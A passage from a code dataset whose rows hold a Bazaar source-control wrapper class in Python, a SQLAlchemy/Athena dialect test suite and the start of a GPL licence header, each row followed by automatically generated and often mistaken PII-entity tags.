['URL', 'const.PRO']] |
62 | ###############################################################################
# Name: Cody Precord #
# Purpose: SourceControl implementation for Bazaar #
# Author: Cody Precord dummy@email.com #
# Copyright: (c) 2008 Cody Precord dummy@email.com #
# License: wxWindows License #
###############################################################################
"""Bazaar implementation of the SourceControl object """
__author__ = "Cody Precord dummy@email.com"
__revision__ = "$Revision: 867 $"
__scid__ = "$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $"
#------------------------------------------------------------------------------#
# Imports
import os
import datetime
import re
import time
# Local imports
from SourceControl import SourceControl, DecodeString
#------------------------------------------------------------------------------#
class BZR(SourceControl):
""" Bazaar source control class """
name = 'Bazaar'
command = 'bzr'
ccache = list() # Cache of paths that are under bazaar control
repocache = dict()
def __repr__(self):
return 'BZR.BZR()'
def getAuthOptions(self, path):
""" Get the repository authentication info """
output = []
return output
def getRepository(self, path):
""" Get the repository of a given path """
if path in self.repocache:
return self.repocache[path]
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
while True:
if not root:
break
if os.path.exists(os.path.join(root, '.bzr')):
break
else:
root = os.path.split(root)[0]
# Cache the repo of this path for faster lookups next time
self.repocache[path] = root
return root
def isControlled(self, path):
""" Is the path controlled by BZR? """
t1 = time.time()
# Check for cached paths to speed up lookup
if path in self.ccache:
return True
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
last = False
while True:
if os.path.exists(os.path.join(root, '.bzr')):
# If a containing directory of the given path has a .bzr
# directory in it run status to find out if the file is being
# tracked or not.
retval = False
out = self.run(root + os.sep, ['status', '-S', path])
if out:
lines = out.stdout.readline()
if lines.startswith('?'):
fname = lines.split(None, 1)[1].strip()
fname = fname.rstrip(os.sep)
retval = not path.endswith(fname)
else:
retval = True
self.closeProcess(out)
if retval:
self.ccache.append(path)
return retval
elif last:
break
else:
root, tail = os.path.split(root)
# If tail is None or '' then this has gotten to the root
# so mark it as the last run
if not tail:
last = True
return False
def add(self, paths):
""" Add paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['add'] + files)
self.logOutput(out)
self.closeProcess(out)
def checkout(self, paths):
""" Checkout files at the given path """
root, files = self.splitFiles(paths)
out = self.run(root, ['checkout',], files)
self.logOutput(out)
self.closeProcess(out)
def commit(self, paths, message=''):
""" Commit paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['commit', '-m', message] + files)
self.logOutput(out)
self.closeProcess(out)
def diff(self, paths):
""" Run the diff program on the given files """
root, files = self.splitFiles(paths)
out = self.run(root, ['diff'] + files)
self.closeProcess(out)
def makePatch(self, paths):
""" Make a patch of the given paths """
root, files = self.splitFiles(paths)
patches = list()
for fname in files:
out = self.run(root, ['diff', fname])
lines = [ line for line in out.stdout ]
self.closeProcess(out)
patches.append((fname, ''.join(lines)))
return patches
def history(self, paths, history=None):
""" Get the revision history of the given paths """
if history is None:
history = []
root, files = self.splitFiles(paths)
for fname in files:
out = self.run(root, ['log', fname])
logstart = False
if out:
for line in out.stdout:
self.log(line)
if line.strip().startswith('-----------'):
logstart = False
current = dict(path=fname, revision=None,
author=None, date=None, log=u'')
history.append(current)
elif line.startswith('message:'):
logstart = True
elif logstart:
current['log'] += DecodeString(line)
elif line.startswith('revno:'):
current['revision'] = DecodeString(line.split(None, 1)[-1].strip())
elif line.startswith('committer:'):
author = line.split(None, 1)[-1]
current['author'] = DecodeString(author.strip())
elif line.startswith('timestamp:'):
date = line.split(None, 1)[-1]
current['date'] = self.str2datetime(date.strip())
else:
pass
self.logOutput(out)
self.closeProcess(out)
return history
def str2datetime(self, tstamp):
""" Convert a timestamp string to a datetime object """
parts = tstamp.split()
ymd = [int(x.strip()) for x in parts[1].split('-')]
hms = [int(x.strip()) for x in parts[2].split(':')]
date = ymd + hms
return datetime.datetime(*date)
def remove(self, paths):
""" Recursively remove paths from repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['remove', '--force'] + files)
self.logOutput(out)
def status(self, paths, recursive=False, status=dict()):
""" Get BZR status information from given file/directory """
codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted',
'M':'modified'}
root, files = self.splitFiles(paths)
# -S gives output similar to svn which is a little easier to work with
out = self.run(root, ['status', '-S'] + files)
repo = self.getRepository(paths[0])
relpath = root.replace(repo, '', 1).lstrip(os.sep)
unknown = list()
if out:
for line in out.stdout:
self.log(line)
txt = line.lstrip(' +-')
# Split the status code and relative file path
code, fname = txt.split(None, 1)
fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep)
fname = fname.replace(relpath, '', 1).lstrip(os.sep)
code = code.rstrip('*')
# Skip unknown files
if code == '?':
unknown.append(fname)
continue
# Get the absolute file path
current = dict()
try:
current['status'] = codes[code]
status[fname] = current
except KeyError:
pass
# Find up to date files
unknown += status.keys()
for path in os.listdir(root):
if path not in unknown:
status[path] = dict(status='uptodate')
self.logOutput(out)
return status
def update(self, paths):
""" Recursively update paths """
root, files = self.splitFiles(paths)
out = self.run(root, ['update'] + files)
self.logOutput(out)
def revert(self, paths):
""" Recursively revert paths to repository version """
root, files = self.splitFiles(paths)
if not files:
files = ['.']
out = self.run(root, ['revert'] + files)
self.logOutput(out)
def fetch(self, paths, rev=None, date=None):
""" Fetch a copy of the paths' contents """
output = []
for path in paths:
if os.path.isdir(path):
continue
root, files = self.splitFiles(path)
options = []
if rev:
options.append('-r')
options.append(str(rev))
if date:
# Date format YYYY-MM-DD,HH:MM:SS
options.append('-r')
options.append('date:%s' % date)
out = self.run(root, ['cat'] + options + files)
if out:
output.append(out.stdout.read())
self.logOutput(out)
else:
output.append(None)
return output
| 9,977 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Cody Precord '], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['DATE_TIME', '2009-05-06'], ['LOCATION', 'self.ccache'], ['PERSON', 'fname = lines.split(None'], ['PERSON', 'fname'], ['PERSON', 'logstart'], ['PERSON', '= line.split(None'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'BZR.py'], ['URL', 'BZR.BZ'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'self.cc'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'self.ru'], ['URL', 'os.se'], ['URL', 'out.stdout.re'], ['URL', 'lines.st'], ['URL', 'fname.rs'], ['URL', 'os.se'], ['URL', 'self.cl'], ['URL', 'self.cc'], ['URL', 'os.pa'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'author.st'], ['URL', 'line.st'], ['URL', 'self.st'], ['URL', 'date.st'], ['URL', 'self.cl'], ['URL', 'x.st'], ['URL', 'x.st'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'self.ge'], ['URL', 'root.re'], ['URL', 'os.se'], ['URL', 'out.st'], ['URL', 'line.ls'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'os.se'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'code.rs'], ['URL', 'status.ke'], ['URL', 'os.li'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'os.path.is'], ['URL', 'self.ru'], ['URL', 'out.stdout.re']] |
63 | # -*- coding: utf-8 -*-
import re
import unittest
import uuid
from datetime import date, datetime
from decimal import Decimal
from urllib.parse import quote_plus
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy import String
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, MetaData, Table
from sqlalchemy.sql.sqltypes import (
BIGINT,
BINARY,
BOOLEAN,
DATE,
DECIMAL,
FLOAT,
INTEGER,
STRINGTYPE,
TIMESTAMP,
)
from tests.conftest import ENV, SCHEMA
from tests.util import with_engine
class TestSQLAlchemyAthena(unittest.TestCase):
"""Reference test case is following:
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py
"""
def create_engine(self, **kwargs):
conn_str = (
"awsathena+rest://athena.{region_name}.amazonaws.com:443/"
+ "{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}"
+ "&compression=snappy"
)
if "verify" in kwargs:
conn_str += "&verify={verify}"
if "duration_seconds" in kwargs:
conn_str += "&duration_seconds={duration_seconds}"
if "poll_interval" in kwargs:
conn_str += "&poll_interval={poll_interval}"
if "kill_on_interrupt" in kwargs:
conn_str += "&kill_on_interrupt={kill_on_interrupt}"
return create_engine(
conn_str.format(
region_name=ENV.region_name,
schema_name=SCHEMA,
s3_staging_dir=quote_plus(ENV.s3_staging_dir),
s3_dir=quote_plus(ENV.s3_staging_dir),
**kwargs
)
)
@with_engine()
def test_basic_query(self, engine, conn):
rows = conn.execute("SELECT * FROM one_row").fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].number_of_rows, 1)
self.assertEqual(len(rows[0]), 1)
@with_engine()
def test_reflect_no_such_table(self, engine, conn):
self.assertRaises(
NoSuchTableError,
lambda: Table("this_does_not_exist", MetaData(bind=engine), autoload=True),
)
self.assertRaises(
NoSuchTableError,
lambda: Table(
"this_does_not_exist",
MetaData(bind=engine),
schema="also_does_not_exist",
autoload=True,
),
)
@with_engine()
def test_reflect_table(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_with_schema(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), schema=SCHEMA, autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_include_columns(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine))
version = float(
re.search(r"^([\d]+\.[\d]+)\..+", sqlalchemy.__version__).group(1)
)
if version <= 1.2:
engine.dialect.reflecttable(
conn, one_row_complex, include_columns=["col_int"], exclude_columns=[]
)
elif version == 1.3:
# https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html
# #PI:KEY
engine.dialect.reflecttable(
conn,
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
else: # version >= 1.4
# https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html
# #change-0215fae622c01f9409eb1ba2754f4792
# https://docs.sqlalchemy.org/en/14/core/reflection.html
# #sqlalchemy.engine.reflection.Inspector.reflect_table
insp = sqlalchemy.inspect(engine)
insp.reflect_table(
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
self.assertEqual(len(one_row_complex.c), 1)
self.assertIsNotNone(one_row_complex.c.col_int)
self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)
@with_engine()
def test_unicode(self, engine, conn):
unicode_str = "密林"
one_row = Table("one_row", MetaData(bind=engine))
returned_str = sqlalchemy.select(
[expression.bindparam("あまぞん", unicode_str, type_=String())],
from_obj=one_row,
).scalar()
self.assertEqual(returned_str, unicode_str)
@with_engine()
def test_reflect_schemas(self, engine, conn):
insp = sqlalchemy.inspect(engine)
schemas = insp.get_schema_names()
self.assertIn(SCHEMA, schemas)
self.assertIn("default", schemas)
@with_engine()
def test_get_table_names(self, engine, conn):
meta = MetaData()
meta.reflect(bind=engine)
print(meta.tables)
self.assertIn("one_row", meta.tables)
self.assertIn("one_row_complex", meta.tables)
insp = sqlalchemy.inspect(engine)
self.assertIn(
"many_rows",
insp.get_table_names(schema=SCHEMA),
)
@with_engine()
def test_has_table(self, engine, conn):
insp = sqlalchemy.inspect(engine)
self.assertTrue(insp.has_table("one_row", schema=SCHEMA))
self.assertFalse(insp.has_table("this_table_does_not_exist", schema=SCHEMA))
@with_engine()
def test_get_columns(self, engine, conn):
insp = sqlalchemy.inspect(engine)
actual = insp.get_columns(table_name="one_row", schema=SCHEMA)[0]
self.assertEqual(actual["name"], "number_of_rows")
self.assertTrue(isinstance(actual["type"], INTEGER))
self.assertTrue(actual["nullable"])
self.assertIsNone(actual["default"])
self.assertEqual(actual["ordinal_position"], 1)
self.assertIsNone(actual["comment"])
@with_engine()
def test_char_length(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
result = (
sqlalchemy.select(
[sqlalchemy.func.char_length(one_row_complex.c.col_string)]
)
.execute()
.scalar()
)
self.assertEqual(result, len("a string"))
@with_engine()
def test_reflect_select(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row_complex.c), 15)
self.assertIsInstance(one_row_complex.c.col_string, Column)
rows = one_row_complex.select().execute().fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(
list(rows[0]),
[
True,
127,
32767,
2147483647,
9223372036854775807,
0.5,
0.25,
"a string",
datetime(2017, 1, 1, 0, 0, 0),
date(2017, 1, 2),
b"123",
"[1, 2]",
"{1=2, 3=4}",
"{a=1, b=2}",
Decimal("0.1"),
],
)
self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)
self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)
self.assertIsInstance(one_row_complex.c.col_date.type, DATE)
self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)
self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)
@with_engine()
def test_reserved_words(self, engine, conn):
"""Presto uses double quotes, not backticks"""
fake_table = Table(
"select", MetaData(bind=engine), Column("current_timestamp", STRINGTYPE)
)
query = str(fake_table.select(fake_table.c.current_timestamp == "a"))
self.assertIn('"select"', query)
self.assertIn('"current_timestamp"', query)
self.assertNotIn("`select`", query)
self.assertNotIn("`current_timestamp`", query)
@with_engine()
def test_retry_if_data_catalog_exception(self, engine, conn):
dialect = engine.dialect
exc = OperationalError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Namespace does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Table does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError("", None, "foobar.")
self.assertTrue(
dialect._retry_if_data_catalog_exception(exc, "foobar", "foobar")
)
exc = ProgrammingError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
@with_engine()
def test_get_column_type(self, engine, conn):
dialect = engine.dialect
self.assertEqual(dialect._get_column_type("boolean"), "boolean")
self.assertEqual(dialect._get_column_type("tinyint"), "tinyint")
self.assertEqual(dialect._get_column_type("smallint"), "smallint")
self.assertEqual(dialect._get_column_type("integer"), "integer")
self.assertEqual(dialect._get_column_type("bigint"), "bigint")
self.assertEqual(dialect._get_column_type("real"), "real")
self.assertEqual(dialect._get_column_type("double"), "double")
self.assertEqual(dialect._get_column_type("varchar"), "varchar")
self.assertEqual(dialect._get_column_type("timestamp"), "timestamp")
self.assertEqual(dialect._get_column_type("date"), "date")
self.assertEqual(dialect._get_column_type("varbinary"), "varbinary")
self.assertEqual(dialect._get_column_type("array(integer)"), "array")
self.assertEqual(dialect._get_column_type("map(integer, integer)"), "map")
self.assertEqual(dialect._get_column_type("row(a integer, b integer)"), "row")
self.assertEqual(dialect._get_column_type("decimal(10,1)"), "decimal")
@with_engine()
def test_contain_percents_character_query(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d')
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query)
self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])
query_with_limit = (
sqlalchemy.sql.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit)
self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])
@with_engine()
def test_query_with_parameter(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT :word
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query, word="cat")
self.assertEqual(result.fetchall(), [("cat",)])
query_with_limit = (
sqlalchemy.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit, word="cat")
self.assertEqual(result_with_limit.fetchall(), [("cat",)])
@with_engine()
def test_contain_percents_character_query_with_parameter(self, engine, conn):
select1 = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d'), :word
"""
)
table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()
query1 = sqlalchemy.select(["*"]).select_from(table_expression1)
result1 = engine.execute(query1, word="cat")
self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), "cat")])
query_with_limit1 = (
sqlalchemy.select(["*"]).select_from(table_expression1).limit(1)
)
result_with_limit1 = engine.execute(query_with_limit1, word="cat")
self.assertEqual(
result_with_limit1.fetchall(), [(datetime(2019, 10, 30), "cat")]
)
select2 = sqlalchemy.sql.text(
"""
SELECT col_string, :param FROM one_row_complex
WHERE col_string LIKE 'a%' OR col_string LIKE :param
"""
)
table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()
query2 = sqlalchemy.select(["*"]).select_from(table_expression2)
result2 = engine.execute(query2, param="b%")
self.assertEqual(result2.fetchall(), [("a string", "b%")])
query_with_limit2 = (
sqlalchemy.select(["*"]).select_from(table_expression2).limit(1)
)
result_with_limit2 = engine.execute(query_with_limit2, param="b%")
self.assertEqual(result_with_limit2.fetchall(), [("a string", "b%")])
@with_engine()
def test_nan_checks(self, engine, conn):
dialect = engine.dialect
self.assertFalse(dialect._is_nan("string"))
self.assertFalse(dialect._is_nan(1))
self.assertTrue(dialect._is_nan(float("nan")))
@with_engine()
def test_to_sql(self, engine, conn):
# TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:
# Column 'foobar' cannot be resolved.
# def _format_bytes(formatter, escaper, val):
# return val.decode()
table_name = "to_sql_{0}".format(str(uuid.uuid4()).replace("-", ""))
df = pd.DataFrame(
{
"col_int": np.int32([1]),
"col_bigint": np.int64([12345]),
"col_float": np.float32([1.0]),
"col_double": np.float64([1.2345]),
"col_string": ["a"],
"col_boolean": np.bool_([True]),
"col_timestamp": [datetime(2020, 1, 1, 0, 0, 0)],
"col_date": [date(2020, 12, 31)],
# "col_binary": "foobar".encode(),
}
)
# Explicitly specify column order
df = df[
[
"col_int",
"col_bigint",
"col_float",
"col_double",
"col_string",
"col_boolean",
"col_timestamp",
"col_date",
# "col_binary",
]
]
df.to_sql(
table_name,
engine,
schema=SCHEMA,
index=False,
if_exists="replace",
method="multi",
)
table = Table(table_name, MetaData(bind=engine), autoload=True)
self.assertEqual(
table.select().execute().fetchall(),
[
(
1,
12345,
1.0,
1.2345,
"a",
True,
datetime(2020, 1, 1, 0, 0, 0),
date(2020, 12, 31),
# "foobar".encode(),
)
],
)
@with_engine(verify="false")
def test_conn_str_verify(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertFalse(kwargs["verify"])
@with_engine(duration_seconds="1800")
def test_conn_str_duration_seconds(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertEqual(kwargs["duration_seconds"], 1800)
@with_engine(poll_interval="5")
def test_conn_str_poll_interval(self, engine, conn):
self.assertEqual(conn.connection.poll_interval, 5)
@with_engine(kill_on_interrupt="false")
def test_conn_str_kill_on_interrupt(self, engine, conn):
self.assertFalse(conn.connection.kill_on_interrupt)
| 20,066 | [['URL', 'urllib.pa'], ['LOCATION', 'TestCase'], ['PERSON', 'quote_plus(ENV.s3_staging_dir'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'one_row_complex'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'meta.tables'], ['PERSON', 'meta.tables'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'datetime(2017'], ['PERSON', 'Decimal("0.1'], ['LOCATION', 'conn'], ['PERSON', 'fake_table'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'select1'], ['PERSON', 'query1'], ['PERSON', 'sqlalchemy.select(["*"]).select_from(table_expression1'], ['PERSON', 'query2 ='], ['PERSON', 'result2'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TODO'], ['DATE_TIME', '12'], ['DATE_TIME', '12'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py'], ['URL', 'https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/core/reflection.html'], ['URL', 'sqlalchemy.sql.sc'], ['URL', 'tests.co'], ['URL', '.amazonaws.com'], ['URL', 'str.fo'], ['URL', 'ENV.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 're.se'], ['URL', 'engine.dialect.re'], ['URL', 'engine.dialect.re'], ['URL', 'sqlalchemy.engine.reflection.Inspector.re'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'sqlalchemy.se'], ['URL', 'expression.bi'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'meta.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'insp.ge'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'sqlalchemy.func.ch'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'complex.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'table.se'], ['URL', 'table.c.cu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'pyathena.er'], ['URL', 'val.de'], ['URL', 'np.int'], ['URL', 'np.int'], ['URL', 'np.bo'], ['URL', 'df.to'], ['URL', 'self.as'], ['URL', 'table.se'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.connection.ki']] |
64 | # -*- coding: utf-8 -*-
#
# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com)
#
# This file is part of SpamFighter.
#
# SpamFighter is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SpamFighter is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
